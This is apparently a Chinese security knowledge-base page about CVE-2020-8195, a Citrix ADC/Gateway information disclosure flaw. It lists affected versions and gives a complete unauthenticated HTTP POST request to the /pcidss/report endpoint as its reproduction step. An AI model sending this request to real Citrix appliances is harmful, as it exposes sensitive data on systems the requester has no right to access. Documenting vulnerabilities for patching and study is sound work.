menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2020-8195)Citrix 未授权访问漏洞 chevron_right (CVE-2020-8195)Citrix 未授权访问漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2020-8195)Citrix 未授权访问漏洞.md
    1.54 KB / 2021-07-15 19:49:29
        (CVE-2020-8195)Citrix 未授权访问漏洞
======================================

一、漏洞简介
------------

Citrix ADC和Citrix NetScaler
Gateway存在一个信息泄露漏洞,该漏洞允许经过身份验证的远程恶意用户获取主机上的敏感信息。通过发送特制请求,攻击者可以利用此漏洞获取敏感信息,然后使用此信息对受影响的系统发起进一步的攻击。

二、漏洞影响
------------

Citrix ADC and Citrix Gateway: \< 13.0-58.30

Citrix ADC and NetScaler Gateway: \< 12.1-57.18

Citrix ADC and NetScaler Gateway: \< 12.0-63.21

Citrix ADC and NetScaler Gateway: \< 11.1-64.14 

NetScaler ADC and NetScaler Gateway: \< 10.5-70.18

Citrix SD-WAN WANOP: \< 11.1.1a

Citrix SD-WAN WANOP: \< 11.0.3d

Citrix SD-WAN WANOP: \< 10.2.7

Citrix Gateway Plug-in for Linux: \<  1.0.0.137

三、复现过程
------------

> Citrix 默认签名处允许使用以下HTTP请求下载报告而无需进行身份验证

    POST /pcidss/report?type=all_signatures&sid=254&username=nsroot&profile_name=default&set=0&sig_name=_default_signature_&sig_start_no=1 HTTP/1.1
    Host: www.0-sec.org
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: https://citrix.local/pcidss/launch_report?type=main
    Content-Type: application/xml
    Content-Length: 0
    DNT: 1
    Connection: close
    Upgrade-Insecure-Requests: 1

1.png
    links
    file_download